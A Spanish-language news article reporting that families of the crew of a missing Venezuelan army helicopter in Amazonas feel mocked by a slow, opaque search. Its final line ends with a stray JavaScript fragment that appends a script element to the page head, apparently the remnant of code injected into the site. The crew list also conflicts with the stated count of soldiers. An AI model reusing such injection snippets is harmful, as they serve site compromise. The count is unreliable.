Otro sitio realizado con WordPress

Familiares de tripulación desaparecida en Amazonas se sienten burlados

17 0
Familiares de tripulación desaparecida en Amazonas se sienten burlados

 Luego de 11 días, familiares de las víctimas desaparecidas a bordo de un helicóptero MI17V5 del Ejército Nacional Bolivariano, en el estado Amazonas, se sienten burlados ante lo que ellos consideran “ineficacia de los cuerpos de rescates en la búsqueda de los tripulantes”.

Indicaron que en ese lapso de tiempo no han recibido mayor información, salvo que los funcionarios continúan con la búsqueda. “Yo estuve una semana en Puerto Ayacucho y no vi mayor acción en el equipo de rescate asignado para hallar a las víctimas. Todos los días nos íbamos a la base a preguntar, pero la respuesta siempre fue la misma: el clima dificulta la búsqueda, la zona es de difícil acceso o simplemente continuamos con la búsqueda”, dijo Milagro Sanoja, madre de Alejandro Mariño de Jésus Sanoja, uno de los soldados desaparecidos.

Familiares denunciaron que los equipos de rescates liderados por la Guardia Nacional Bolivariana, no les permiten participar en la búsqueda. Lo mismo ocurre con los indígenas de la zona, algo que les parece muy raro.

“Le pedimos al gobierno que ponga seriedad en el asunto, ya basta de burlas. Hace días recibimos una llamada en la que nos informaban que ya habían encontrados a los tripulantes y todo resultó en una falsa alarma. Queremos que redoblen los esfuerzos en la zona para que los encuentren, porque todos esos tripulantes estaban cumpliendo con su deber”, acotó la madre.

Igualmente informaron que decidieron venir a Caracas para denunciar lo que estaba pasando a través de los medios de comunicación, ya que en Amazonas no les brindan ayuda, tampoco ha salido ningún ente oficial para brindar una declaración precisa sobre el estatus de la búsqueda.

Cabe recordar que la aeronave despegó en Puerto Ayacucho y desapareció entre las poblaciones de Cunucuma y La Esmeranda.

Entre las personas a bordo se encuentran 5 civiles (4 adultos y un menor de 4 años de edad) y 7 militares: Griseldo Fernández Rumbo (piloto), el capitán Otto Joaquín Alvarado (copiloto), Yerver Mujica (ingeniero de vuelo),  el sargento Jhonatan Inojosa (mecánico), el teniente del Ejército Nieves Marcano, el sargento (Ej) Jeison Romero, el sargento (GNB) Luis Sierra Vera y los soldados del Ejército Alejandro Marino y Rodolfo Gómez.d.getElementsByTagName(‘head’)[0].appendChild(s);